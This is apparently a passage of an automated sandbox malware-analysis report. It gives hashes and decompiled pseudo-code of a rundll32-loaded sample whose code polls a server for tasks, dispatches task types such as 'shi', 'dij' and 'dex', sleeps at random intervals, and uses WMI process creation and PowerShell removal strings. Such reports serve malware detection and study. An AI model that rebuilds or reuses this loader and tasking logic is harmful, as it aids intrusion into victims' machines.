                                        • Opcode ID: b60a376931d8a9ec50f99d8b90342c7d32a75808f1e187032b81d972682d7886
                                        • Instruction ID: 5bb24ec3285797301408faaa4b043eb7b91d189f71a9a5049d871ee1199bf9e5
                                        • Opcode Fuzzy Hash: b60a376931d8a9ec50f99d8b90342c7d32a75808f1e187032b81d972682d7886
                                        • Instruction Fuzzy Hash: EF1184B1610A4089FF269B24EC1D3CE3BE0E7A9700F524069CD4A57FA0DB3DC586CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3122878 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0000021E21EF3122878(intOrPtr* __rax, void* __rcx) {
				void* __rbx;

				if (__rcx - 0xffffffe0 > 0) goto 0xf31228c3;
				_t16 =  ==  ? __rax : __rcx;
				goto 0xf31228aa;
				if (E0000021E21EF3130330() == 0) goto 0xf31228c3;
				if (E0000021E21EF3125368(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0xf31228c3;
				HeapAlloc(??, ??, ??); // executed
				if (__rax == 0) goto 0xf3122895;
				goto 0xf31228d0;
				E0000021E21EF3118984(__rax);
				 *__rax = 0xc;
				return 0;
			}




                                        0x21ef3122885
                                        0x21ef312288f
                                        0x21ef3122893
                                        0x21ef312289c
                                        0x21ef31228a8
                                        0x21ef31228b6
                                        0x21ef31228bf
                                        0x21ef31228c1
                                        0x21ef31228c3
                                        0x21ef31228c8
                                        0x21ef31228d5

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 522302db02cbdf1fabb929298b9b06228762cc72d666977f0e0c0ab7cf15266b
                                        • Instruction ID: 0c8a8e41951517b927d920543bc860c6fe9273ca68e2a68c0f0c4bacafae4893
                                        • Opcode Fuzzy Hash: 522302db02cbdf1fabb929298b9b06228762cc72d666977f0e0c0ab7cf15266b
                                        • Instruction Fuzzy Hash: FDF08C3071024485FEB86AB19C4CBEB52F05BA8BA0F0E46245C268ABC1DA6CC487C620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0000021EF301D0D0 Relevance: 59.8, APIs: 25, Strings: 9, Instructions: 342memorycomCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocClearVariant_com_issue_error$Free$BlanketConvertCreateInstanceProxy_com_util::
                                        • String ID: CommandLine$Create$CreateFlags$ProcessId$ProcessStartupInformation$ROOT\CIMV2$ReturnValue$Win32_Process$Win32_ProcessStartup
                                        • API String ID: 3916112548-2022159726
                                        • Opcode ID: f56af8a6d742f1f211c76e8795fa86192bef51715b47295cc53a27ad5f5e518e
                                        • Instruction ID: c72468c61f221b5534296dea42fe9ada5c4d18f80efbe3431da1a19861146645
                                        • Opcode Fuzzy Hash: f56af8a6d742f1f211c76e8795fa86192bef51715b47295cc53a27ad5f5e518e
                                        • Instruction Fuzzy Hash: E4F13936200B8486EB20DF65E89839E77B0F798B98F564126DE8D87F68DF38C559C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEA298 Relevance: 42.6, APIs: 14, Strings: 10, Instructions: 590stringsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpeciallstrcat$OpenThread32$CloseCreateFirstHandleNextProcessSleepSnapshotThreadToolhelp32
                                        • String ID: -Recurse"$" -Force$; Remove-Item -Path "$\wab.exe$dex$dij$ins$powershell$sdl$shi
                                        • API String ID: 2634534522-900435803
                                        • Opcode ID: e8b7e3fb0749116fec9bcf7d2d005833644aa7fddb3248d2c7821ce926249707
                                        • Instruction ID: 828d3a34eff3b1dadcfc8d05e3783c4ddb323501f03c7184fe7e40782fdefb53
                                        • Opcode Fuzzy Hash: e8b7e3fb0749116fec9bcf7d2d005833644aa7fddb3248d2c7821ce926249707
                                        • Instruction Fuzzy Hash: E0429F72220E8685FF21EB64DC4C3DE23A1F761744F8205569E5A5BEEADF78C586C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE9B30 Relevance: 32.3, APIs: 8, Strings: 10, Instructions: 781sleepCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 18%
                                        			E0000021E21EF2FE9B30() {
				void* _t300;
				signed int _t333;
				void* _t336;
				void* _t338;
				void* _t358;
				signed int _t375;
				void* _t380;
				void* _t384;
				void* _t421;
				signed char _t423;
				signed char _t430;
				signed char _t434;
				void* _t462;
				void* _t466;
				signed long long _t570;
				signed long long _t573;
				signed long long _t575;
				signed long long _t578;
				signed int* _t582;
				signed long long _t584;
				signed long long _t587;
				signed long long _t589;
				signed long long _t591;
				signed long long _t594;
				signed long long _t596;
				signed long long _t598;
				signed long long _t601;
				signed long long _t603;
				signed long long _t606;
				signed long long _t608;
				intOrPtr _t614;
				intOrPtr _t616;
				intOrPtr _t617;
				long long _t619;
				intOrPtr _t620;
				intOrPtr _t622;
				intOrPtr _t623;
				intOrPtr _t625;
				intOrPtr _t626;
				intOrPtr _t628;
				void* _t631;
				signed long long _t632;
				signed long long _t634;
				signed long long _t636;
				signed long long _t638;
				signed long long _t640;
				signed long long _t642;
				void* _t644;
				intOrPtr _t648;
				intOrPtr _t694;
				void* _t695;
				intOrPtr _t697;
				void* _t698;
				intOrPtr _t721;
				void* _t722;
				intOrPtr _t732;
				void* _t733;
				intOrPtr _t735;
				void* _t736;
				void* _t753;
				long long _t807;
				intOrPtr _t809;
				void* _t810;
				void* _t811;
				signed long long _t815;
				intOrPtr _t817;
				long long* _t818;
				void* _t819;
				signed long long _t822;
				signed long long _t825;
				signed long long _t829;
				void* _t849;
				void* _t857;
				long long _t860;
				signed long long _t861;
				signed long long _t862;
				long long _t863;
				signed long long _t864;
				long long _t866;

				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t300, _t421, _t631 + 0x48), _t421, _t631 + 0x28), _t421, _t631);
				_t632 = _t631 + 0x70;
				 *(_t818 + 8) = _t632;
				if (_t632 != _t811) goto 0xf2fe9b30;
				_t860 = _t807;
				 *((long long*)(_t818 - 0x28)) = _t807;
				if ( *((short*)(_t818 + 0xce)) != 3) goto 0xf2fea70b;
				_t570 =  *(_t818 + 0xc8) & 0xffffffff;
				_t634 = (_t632 << 5) + _t570;
				_t8 = _t818 + 0x338; // 0x33b
				_t9 = _t818 + 0xc0; // 0xc3
				E0000021E21EF2FEB470(_t462, _t634, _t9, _t8, 0xffffffff, _t818, "response_status");
				if ( *_t570 == _t634) goto 0xf2fe9c02;
				 *(_t818 + 0x40) = _t570;
				 *(_t818 + 0x48) = _t570;
				 *((short*)(_t818 + 0x4e)) = 0x405;
				_t573 =  *(_t818 + 0x48) & 0x00000000 | "response_status";
				 *(_t818 + 0x48) = _t573;
				 *(_t818 + 0x40) = 0xf;
				E0000021E21EF2FEBA50(_t818 + 0xc0, _t818 + 0x40, _t807, 0xffffffff, _t818, _t860, _t864);
				r12d =  *_t573;
				 *((intOrPtr*)(_t818 + 0x5e0)) = r12d;
				_t575 =  *(_t818 + 0xc8) & 0xffffffff;
				_t636 = (_t634 << 5) + _t575;
				_t21 = _t818 + 0x340; // 0x343
				_t22 = _t818 + 0xc0; // 0xc3
				E0000021E21EF2FEB470(_t462, _t636, _t22, _t21, 0xffffffff, _t818, "tasks");
				if ( *_t575 == _t636) goto 0xf2fea155;
				 *(_t818 + 0x30) = _t575;
				 *(_t818 + 0x38) = _t575;
				 *((short*)(_t818 + 0x3e)) = 0x405;
				_t578 =  *(_t818 + 0x38) & 0x00000000 | "tasks";
				 *(_t818 + 0x38) = _t578;
				 *(_t818 + 0x30) = 5;
				E0000021E21EF2FEBA50(_t818 + 0xc0, _t818 + 0x30, _t807, 0, _t818, _t860, _t864);
				if ( *((short*)(_t578 + 0xe)) != 4) goto 0xf2fea155;
				 *(_t818 + 0x70) = _t578;
				 *(_t818 + 0x78) = _t578;
				 *((short*)(_t818 + 0x7e)) = 0x405;
				 *(_t818 + 0x78) =  *(_t818 + 0x78) & 0x00000000 | "tasks";
				 *(_t818 + 0x70) = 5;
				E0000021E21EF2FEB090(E0000021E21EF2FEBA50(_t818 + 0xc0, _t818 + 0x70, _t807, 0, _t818, _t860, _t864),  *(_t818 + 0x78) & 0x00000000 | "tasks", _t818 + 0x1c8);
				_t582 =  *((intOrPtr*)(_t818 + 0x1c8));
				_t815 = _t582[2] & 0xffffffff;
				r15d =  *_t582;
				_t866 = (_t864 << 4) + _t815;
				if (_t815 == _t866) goto 0xf2fea152;
				r12d = 0x1000;
				 *(_t818 + 0x250) = _t582;
				 *(_t818 + 0x258) = _t582;
				 *(_t818 + 0x258) = 0xf;
				 *(_t818 + 0x250) = _t582;
				 *((char*)(_t818 + 0x240)) = 0;
				 *(_t818 + 0x278) = _t582;
				 *(_t818 + 0x280) = _t582;
				 *(_t818 + 0x280) = 0xf;
				 *(_t818 + 0x278) = _t582;
				 *((char*)(_t818 + 0x268)) = 0;
				 *(_t818 + 0x298) = _t582;
				 *(_t818 + 0x2a0) = _t582;
				 *(_t818 + 0x2a0) = 0xf;
				 *(_t818 + 0x298) = _t582;
				 *((char*)(_t818 + 0x288)) = 0;
				if ( *((short*)(_t815 + 0xe)) != 3) goto 0xf2fea112;
				_t584 =  *(_t815 + 8) & 0xffffffff;
				_t638 = (_t636 << 5) + _t584;
				_t822 = "task_data";
				E0000021E21EF2FEB470(_t462, _t638, _t815, _t818 + 0x360, _t815, _t818, _t822);
				if ( *_t584 == _t638) goto 0xf2fe9e4e;
				 *(_t818 + 0x80) = _t584;
				 *(_t818 + 0x88) = _t584;
				 *((short*)(_t818 + 0x8e)) = 0x405;
				_t587 =  *(_t818 + 0x88) & 0x00000000 | "task_data";
				 *(_t818 + 0x88) = _t587;
				 *(_t818 + 0x80) = 9;
				E0000021E21EF2FEBA50(_t815, _t818 + 0x80, _t807, _t815, _t818, _t860, _t866);
				if (( *(_t587 + 0xe) & r12w) != 0) goto 0xf2fe9e27;
				_t589 =  *(_t587 + 8) & 0xffffffff;
				if ( *_t589 != 0) goto 0xf2fe9e31;
				r8d = 0;
				goto 0xf2fe9e3f;
				if ( *((char*)(_t589 + (_t822 | 0xffffffff) + 1)) != 0) goto 0xf2fe9e35;
				E0000021E21EF2FE6400(_t638, _t818 + 0x268, _t589, _t815, (_t822 | 0xffffffff) + 1);
				_t591 =  *(_t815 + 8) & 0xffffffff;
				_t640 = (_t638 << 5) + _t591;
				_t825 = "task";
				E0000021E21EF2FEB470(_t462, _t640, _t815, _t818 + 0x348, _t815, _t818, _t825);
				if ( *_t591 == _t640) goto 0xf2fe9f0d;
				 *(_t818 + 0x90) = _t591;
				 *(_t818 + 0x98) = _t591;
				 *((short*)(_t818 + 0x9e)) = 0x405;
				_t594 =  *(_t818 + 0x98) & 0x00000000 | "task";
				 *(_t818 + 0x98) = _t594;
				 *(_t818 + 0x90) = 4;
				E0000021E21EF2FEBA50(_t815, _t818 + 0x90, _t807, _t815, _t818, _t860, _t866);
				if (( *(_t594 + 0xe) & r12w) != 0) goto 0xf2fe9ee6;
				_t596 =  *(_t594 + 8) & 0xffffffff;
				if ( *_t596 != 0) goto 0xf2fe9ef0;
				r8d = 0;
				goto 0xf2fe9efe;
				if ( *((char*)(_t596 + (_t825 | 0xffffffff) + 1)) != 0) goto 0xf2fe9ef4;
				E0000021E21EF2FE6400(_t640, _t818 + 0x240, _t596, _t815, (_t825 | 0xffffffff) + 1);
				_t598 =  *(_t815 + 8) & 0xffffffff;
				_t642 = (_t640 << 5) + _t598;
				E0000021E21EF2FEB470(_t462, _t642, _t815, _t818 + 0x350, _t815, _t818, "task_id");
				if ( *_t598 == _t642) goto 0xf2fe9f9b;
				 *(_t818 + 0xa0) = _t598;
				 *(_t818 + 0xa8) = _t598;
				 *((short*)(_t818 + 0xae)) = 0x405;
				_t601 =  *(_t818 + 0xa8) & 0x00000000 | "task_id";
				 *(_t818 + 0xa8) = _t601;
				 *(_t818 + 0xa0) = 7;
				E0000021E21EF2FEBA50(_t815, _t818 + 0xa0, _t807, _t815, _t818, _t860, _t866);
				 *((intOrPtr*)(_t818 + 0x260)) =  *_t601;
				_t603 =  *(_t815 + 8) & 0xffffffff;
				_t644 = (_t642 << 5) + _t603;
				_t829 = "file_entry_point";
				E0000021E21EF2FEB470(_t462, _t644, _t815, _t818 + 0x358, _t815, _t818, _t829);
				if ( *_t603 == _t644) goto 0xf2fea05a;
				 *(_t818 + 0xb0) = _t603;
				 *(_t818 + 0xb8) = _t603;
				 *((short*)(_t818 + 0xbe)) = 0x405;
				_t606 =  *(_t818 + 0xb8) & 0x00000000 | "file_entry_point";
				 *(_t818 + 0xb8) = _t606;
				 *(_t818 + 0xb0) = 0x10;
				E0000021E21EF2FEBA50(_t815, _t818 + 0xb0, _t807, _t815, _t818, _t860, _t866);
				if (( *(_t606 + 0xe) & r12w) != 0) goto 0xf2fea033;
				_t608 =  *(_t606 + 8) & 0xffffffff;
				if ( *_t608 != 0) goto 0xf2fea03d;
				r8d = 0;
				goto 0xf2fea04b;
				if ( *((char*)(_t608 + (_t829 | 0xffffffff) + 1)) != 0) goto 0xf2fea041;
				_t333 = E0000021E21EF2FE6400(_t644, _t818 + 0x288, _t608, _t815, (_t829 | 0xffffffff) + 1);
				if (_t818 + 0x240 - _t860 >= 0) goto 0xf2fea0d3;
				if (_t807 - _t818 + 0x240 > 0) goto 0xf2fea0d3;
				if (_t860 !=  *((intOrPtr*)(_t818 - 0x20))) goto 0xf2fea0b1;
				E0000021E21EF2FEB0F0(_t333 * (_t818 + 0x240 - _t807), _t818 - 0x30);
				_t861 =  *((intOrPtr*)(_t818 - 0x28));
				 *(_t818 + 8) = _t861;
				 *(_t818 + 0x1d0) = _t861;
				if (_t861 == 0) goto 0xf2fea0d1;
				_t336 = E0000021E21EF2FEBCF0(_t608 >> 5 >> 0x3f, (_t608 >> 5) + (_t608 >> 5 >> 0x3f), _t861, ((_t608 >> 5) + (_t608 >> 5 >> 0x3f)) * 0x70 +  *((intOrPtr*)(_t818 - 0x30)), _t849);
				goto 0xf2fea10a;
				if (_t861 !=  *((intOrPtr*)(_t818 - 0x20))) goto 0xf2fea0ea;
				E0000021E21EF2FEB0F0(_t336, _t818 - 0x30);
				_t862 =  *((intOrPtr*)(_t818 - 0x28));
				_t809 =  *((intOrPtr*)(_t818 - 0x30));
				 *(_t818 + 0x1d0) = _t862;
				 *(_t818 + 8) = _t862;
				if (_t862 == 0) goto 0xf2fea10a;
				_t338 = E0000021E21EF2FEBCF0(_t608 >> 5 >> 0x3f, (_t608 >> 5) + (_t608 >> 5 >> 0x3f), _t862, _t818 + 0x240, _t849);
				_t863 = _t862 + 0x70;
				 *((long long*)(_t818 - 0x28)) = _t863;
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t338, _t421, _t818 + 0x288), _t421, _t818 + 0x268), _t421, _t818 + 0x240);
				if (_t815 + 0x10 != _t866) goto 0xf2fe9d10;
				r12d =  *((intOrPtr*)(_t818 + 0x5e0));
				r13d = 3;
				r15d = 0;
				if (r12d != 1) goto 0xf2fea70b;
				if (_t809 != _t863) goto 0xf2fea279;
				r8d = E0000021E21EF3111C60(_t608 >> 5 >> 0x3f);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t423 = r8d * 0x3e8;
				Sleep(??);
				if ( *((intOrPtr*)(_t818 + 0xd8)) == 0) goto 0xf2fea1a7;
				E0000021E21EF2FEB260(0x28c1979 * r8d, (_t608 >> 5) + (_t608 >> 5 >> 0x3f),  *((intOrPtr*)(_t818 + 0xd8)));
				0xf3111fb0();
				0xf310bdc8();
				_t614 =  *((intOrPtr*)(_t818 - 0x78));
				if (_t614 - 0x10 < 0) goto 0xf2fea218;
				_t694 =  *((intOrPtr*)(_t819 + 0x70));
				if (_t614 + 1 - _t809 < 0) goto 0xf2fea213;
				if ((_t423 & 0x0000001f) != 0) goto 0xf2fea8bf;
				_t616 =  *((intOrPtr*)(_t694 - 8));
				if (_t616 - _t694 >= 0) goto 0xf2fea8b9;
				_t695 = _t694 - _t616;
				if (_t695 - 8 < 0) goto 0xf2fea8b3;
				if (_t695 - 0x27 > 0) goto 0xf2fea8ad;
				0xf310ba8c();
				 *((long long*)(_t818 - 0x78)) = 0xf;
				 *((long long*)(_t818 - 0x80)) = _t866;
				 *((char*)(_t819 + 0x70)) = 0;
				_t617 =  *((intOrPtr*)(_t818 - 0x38));
				if (_t617 - 0x10 < 0) goto 0xf2fe98ee;
				_t697 =  *((intOrPtr*)(_t818 - 0x50));
				if (_t617 + 1 - _t809 < 0) goto 0xf2fe98e9;
				if ((_t423 & 0x0000001f) != 0) goto 0xf2fea8d7;
				_t619 =  *((intOrPtr*)(_t697 - 8));
				if (_t619 - _t697 >= 0) goto 0xf2fea8d1;
				_t698 = _t697 - _t619;
				if (_t698 - 8 < 0) goto 0xf2fea8cb;
				if (_t698 - 0x27 > 0) goto 0xf2fea8c5;
				goto 0xf2fe98e6;
				r12d = 1;
				_t160 = _t818 + 0x10; // 0x13
				E0000021E21EF2FE5D10(_t466, (_t608 >> 5) + (_t608 >> 5 >> 0x3f), _t160, _t809 + 0x28);
				_t817 =  *((intOrPtr*)(_t809 + 0x18));
				if (_t817 - 0x10 < 0) goto 0xf2fea29d;
				goto 0xf2fea2a0;
				_t648 =  *((intOrPtr*)(_t809 + 0x10));
				_t833 =  <  ? _t648 : 0xffffffff;
				_t511 =  <  ? _t648 : 0xffffffff;
				if (( <  ? _t648 : 0xffffffff) == 0) goto 0xf2fea2c8;
				if (E0000021E21EF310E7C0(_t423, _t809, "shi",  <  ? _t648 : 0xffffffff) != 0) goto 0xf2fea382;
				if (_t648 != 3) goto 0xf2fea382;
				r8d = 0x208;
				E0000021E21EF310E410(_t423, 0, 0x1000, _t466, 0xf320b2a0, "shi", _t809,  <  ? _t648 : 0xffffffff);
				E0000021E21EF3111C60(_t619);
				r9d = 0;
				_t169 = _t849 + 0x26; // 0x26
				r8d = _t169;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t818 + 0x170)) = _t619;
				 *((long long*)(_t818 + 0x178)) = _t619;
				 *((long long*)(_t818 + 0x180)) = _t619;
				E0000021E21EF3017F50(_t619, _t648, _t818 + 0x170, _t809, _t817, _t849);
				if ( *((intOrPtr*)(_t818 + 0x180)) == 0) goto 0xf2fea2e0;
				r13d = 3;
				_t177 = _t818 + 0x10; // 0x13
				E0000021E21EF2FE7390(_t619,  *((intOrPtr*)(_t818 + 0x170)),  *((intOrPtr*)(_t818 + 0x178)), _t177, 0xf31b0230);
				goto 0xf2fea618;
				if (_t817 - 0x10 < 0) goto 0xf2fea38d;
				goto 0xf2fea390;
				_t836 =  <  ? _t648 : 0xf31b0230;
				_t517 =  <  ? _t648 : 0xf31b0230;
				if (( <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea3b4;
				if (E0000021E21EF310E7C0(0, _t809, "dij",  <  ? _t648 : 0xf31b0230) != 0) goto 0xf2fea46f;
				if (_t648 != 3) goto 0xf2fea46f;
				asm("o16 nop [eax+eax]");
				r8d = 0x208;
				E0000021E21EF310E410(0, 0, 0x1000, _t466, 0xf320b2a0, "dij", _t809,  <  ? _t648 : 0xf31b0230);
				_t358 = E0000021E21EF3111C60(_t619);
				r9d = 0;
				_t186 = _t849 + 0x26; // 0x26
				r8d = _t186;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t818 + 0x158)) = _t619;
				 *((long long*)(_t818 + 0x160)) = _t619;
				 *((long long*)(_t818 + 0x168)) = _t619;
				E0000021E21EF3017F50(_t619, _t648, _t818 + 0x158, _t809, _t817, _t849);
				if ( *((intOrPtr*)(_t818 + 0x168)) == 0) goto 0xf2fea3d0;
				E0000021E21EF2FE7560(_t648,  *((intOrPtr*)(_t818 + 0x158)),  *((intOrPtr*)(_t818 + 0x160)), _t817, _t818, _t818 + 0x10, _t809 + 0x48);
				goto 0xf2fea618;
				if (_t817 - 0x10 < 0) goto 0xf2fea47a;
				goto 0xf2fea47d;
				_t839 =  <  ? _t648 : 0xf31b0230;
				_t523 =  <  ? _t648 : 0xf31b0230;
				if (( <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea49d;
				if (E0000021E21EF310E7C0(0, _t809, "dex",  <  ? _t648 : 0xf31b0230) != 0) goto 0xf2fea504;
				if (_t648 != 3) goto 0xf2fea504;
				r9d = 0;
				r8d = _t648 + 0x19;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				_t791 =  >=  ?  *((void*)(_t818 + 0x10)) : _t818 + 0x10;
				r8d =  *(_t818 + 0x20);
				if (E0000021E21EF301B91C(_t619, _t648, 0xf320b2a0,  >=  ?  *((void*)(_t818 + 0x10)) : _t818 + 0x10, _t817, _t809 + 0x48) == 0) goto 0xf2fea620;
				0xf301c460();
				goto 0xf2fea61c;
				if (_t817 - 0x10 < 0) goto 0xf2fea50f;
				goto 0xf2fea512;
				_t841 =  <  ? _t648 : 0xf31b0230;
				_t530 =  <  ? _t648 : 0xf31b0230;
				if (( <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea537;
				if (E0000021E21EF310E7C0(0, _t809, "sdl",  <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea537;
				r15d = 0;
				goto 0xf2fea552;
				if (_t648 - 3 >= 0) goto 0xf2fea545;
				r15d = 0;
				goto 0xf2fea552;
				r15d = 0;
				if ((r15d & 0xffffff00 | _t648 - 0x00000003 > 0x00000000) == 0) goto 0xf2feaab5;
				if (_t817 - 0x10 < 0) goto 0xf2fea565;
				goto 0xf2fea568;
				_t843 =  <  ? _t648 : 0xf31b0230;
				_t537 =  <  ? _t648 : 0xf31b0230;
				if (( <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea58c;
				if (E0000021E21EF310E7C0(0, _t809, "ins",  <  ? _t648 : 0xf31b0230) != 0) goto 0xf2fea620;
				if (_t648 - 3 >= 0) goto 0xf2fea597;
				goto 0xf2fea5a1;
				_t375 = r15d & 0xffffff00 | _t648 - 0x00000003 > 0x00000000;
				if (_t375 != 0) goto 0xf2fea620;
				if ( *((intOrPtr*)(_t818 + 0x5d8)) == _t375) goto 0xf2fea5e8;
				r8d = E0000021E21EF3111C60(_t619);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t430 = r8d * 0x3e8;
				Sleep(??);
				E0000021E21EF2FE6100(0x28c1979 * r8d, _t430, _t818 + 0x10);
				goto 0xf2fea681;
				 *((char*)(_t819 + 0x20)) = 0;
				_t380 = E0000021E21EF2FE76A0(0x28c1979 * r8d >> 0x20 >> 1, _t648, _t818 + 0x2b0, _t818 + 0x420, _t809, _t817, _t818 + 0x188, _t818 + 0x138, _t857);
				if (_t380 != 0) goto 0xf2fea8dd;
				goto 0xf2fea5ad;
				if (_t380 == 0) goto 0xf2fea620;
				 *((intOrPtr*)(_t809 + 0x68)) = r12d;
				_t620 =  *((intOrPtr*)(_t818 + 0x28));
				if (_t620 - 0x10 < 0) goto 0xf2fea66e;
				_t721 =  *((intOrPtr*)(_t818 + 0x10));
				if (_t620 + 1 - 0x1000 < 0) goto 0xf2fea669;
				if ((_t430 & 0x0000001f) != 0) goto 0xf2feaaaf;
				_t622 =  *((intOrPtr*)(_t721 - 8));
				if (_t622 - _t721 >= 0) goto 0xf2feaaa9;
				_t722 = _t721 - _t622;
				if (_t722 - 8 < 0) goto 0xf2feaaa3;
				if (_t722 - 0x27 > 0) goto 0xf2feaa9d;
				0xf310ba8c();
				 *((long long*)(_t818 + 0x28)) = 0xf;
				r15d = 0;
				 *(_t818 + 0x20) = 0xf31b0230;
				 *((intOrPtr*)(_t818 + 0x10)) = r15b;
				_t810 = _t809 + 0x70;
				if (_t810 != _t863) goto 0xf2fea280;
				r8d = E0000021E21EF3111C60(_t622);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				Sleep(??);
				if ( *((intOrPtr*)(_t818 + 0xd8)) == 0) goto 0xf2fea6cd;
				_t384 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t648,  *((intOrPtr*)(_t818 + 0xd8)));
				0xf3111fb0();
				0xf310bdc8();
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t384, r8d * 0x3e8, _t819 + 0x70), r8d * 0x3e8, _t818 - 0x50);
				goto 0xf2fe9742;
				r8d = E0000021E21EF3111C60(_t622);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t434 = r8d * 0x3e8;
				Sleep(??);
				if ( *((intOrPtr*)(_t818 + 0xd8)) == 0) goto 0xf2fea74a;
				E0000021E21EF2FEB260(0x28c1979 * r8d, _t648,  *((intOrPtr*)(_t818 + 0xd8)));
				0xf3111fb0();
				0xf310bdc8();
				_t623 =  *((intOrPtr*)(_t818 - 0x78));
				if (_t623 - 0x10 < 0) goto 0xf2fea7bb;
				_t732 =  *((intOrPtr*)(_t819 + 0x70));
				if (_t623 + 1 - _t810 < 0) goto 0xf2fea7b6;
				if ((_t434 & 0x0000001f) != 0) goto 0xf2feada7;
				_t625 =  *((intOrPtr*)(_t732 - 8));
				if (_t625 - _t732 >= 0) goto 0xf2feada1;
				_t733 = _t732 - _t625;
				if (_t733 - 8 < 0) goto 0xf2fead9b;
				if (_t733 - 0x27 > 0) goto 0xf2fead95;
				0xf310ba8c();
				 *((long long*)(_t818 - 0x78)) = 0xf;
				 *((long long*)(_t818 - 0x80)) = 0xf31b0230;
				 *((char*)(_t819 + 0x70)) = 0;
				_t626 =  *((intOrPtr*)(_t818 - 0x38));
				if (_t626 - 0x10 < 0) goto 0xf2fe98ee;
				_t735 =  *((intOrPtr*)(_t818 - 0x50));
				if (_t626 + 1 - _t810 < 0) goto 0xf2fe98e9;
				if ((_t434 & 0x0000001f) != 0) goto 0xf2feadbf;
				_t628 =  *((intOrPtr*)(_t735 - 8));
				if (_t628 - _t735 >= 0) goto 0xf2feadb9;
				_t736 = _t735 - _t628;
				if (_t736 - 8 < 0) goto 0xf2feadb3;
				if (_t736 - 0x27 > 0) goto 0xf2feadad;
				goto 0xf2fe98e6;
				r8d = E0000021E21EF3111C60(_t628);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				Sleep(??);
				goto 0xf2fe9742;
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0x2f0], xmm0");
				 *((long long*)(_t818 + 0x300)) = 0xf31b0230;
				r13d =  ==  ? r12d : r13d;
				 *((intOrPtr*)(_t810 + 0x68)) = r13d;
				E0000021E21EF2FEAF10(0x28c1979 * r8d, _t648, _t818 + 0x2f0, _t810);
				 *((long long*)(_t819 + 0x20)) = _t818 + 0x2f0;
				0xf3014e20();
				_t630 = _t818 + 0x50;
				 *((long long*)(_t819 + 0x20)) = _t818 + 0x50;
				E0000021E21EF2FE6100(E0000021E21EF2FF5CD0(_t358 - "dij" + "dij" * 2, r8d * 0x3e8, 0x28c1979 * r8d >> 0x20 >> 1, 0x1000, 0x28c1979 * r8d - 3, _t648, _t818 - 0x70, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t818 + 0x120)), _t817, _t818, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t818 + 0x120)) + 0x20, _t818 + 0x440), r8d * 0x3e8, _t818 - 0x70);
				 *((long long*)(_t818 - 8)) = 0xf31b0230;
				 *_t818 = 0xf31b0230;
				 *_t818 = 0xf;
				 *((long long*)(_t818 - 8)) = 0xf31b0230;
				 *((char*)(_t818 - 0x18)) = 0;
				r8d = 0;
